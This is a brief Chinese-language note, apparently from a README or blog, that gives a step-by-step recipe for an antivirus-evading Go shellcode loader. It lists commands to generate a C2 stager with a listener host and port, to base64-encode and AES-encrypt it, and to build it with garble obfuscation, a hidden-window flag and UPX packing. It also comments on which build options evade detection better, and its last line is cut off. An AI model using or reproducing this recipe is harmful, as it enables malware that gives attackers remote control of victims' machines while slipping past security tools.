golang自带的嵌入,思路打开,嵌入一个byte的压缩包,图片,然后解密,这里采用的自带的的gzip
//生成shellcode
generate stager --lhost HOST --lport 8443 --arch amd64 --format raw --save ./raw_shellcode
base64 -w 0 -i raw_shellcode > stager.bs64
go run aes.go
//免杀效果拉跨
garble -literals -tiny -seed=random build -ldflags="-w -s -H windowsgui" ./main.go
//免杀效果好
go build -ldflags="-w -s -H windowsgui" ./main.go
//压缩,upx压缩之后容易被查杀
upx.exe -9 -q -o zip.exe main.exe
拷贝stager.bs64中的内容到aes/base64Code.txt
然后执行bat,生成main.exe,免杀效果还行
aes加密部分来自